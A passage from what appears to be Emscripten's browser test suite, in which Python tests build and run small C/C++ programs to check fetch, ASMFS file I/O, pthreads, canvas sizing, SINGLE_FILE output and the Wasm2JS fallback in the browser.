for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
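# Test WebGL extension enabling via the GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS and
# GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS settings, for both WebGL 1 and WebGL 2 contexts.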
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that the shell html page can preallocate the typed array and place it
# in Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', expected='0', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
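# Tests emscripten_fetch() usage that persists the downloaded data into IndexedDB (fetch/to_indexeddb.cpp).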
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
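# Test that locale handling works both without pthreads and in a pthread-enabled build.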
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
  # Similar to `test_browser_run_from_different_directory`, but
  # we also eval the initial code, so currentScript is not present. That prevents us
  # from finding the file in a subdir, but here we at least check that we do not regress
  # compared to the normal case of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
      # Then disable WebAssembly support in the VM and try again. It should still work with the Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
      # Restore the .wasm.js file, then corrupt the .wasm file; that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
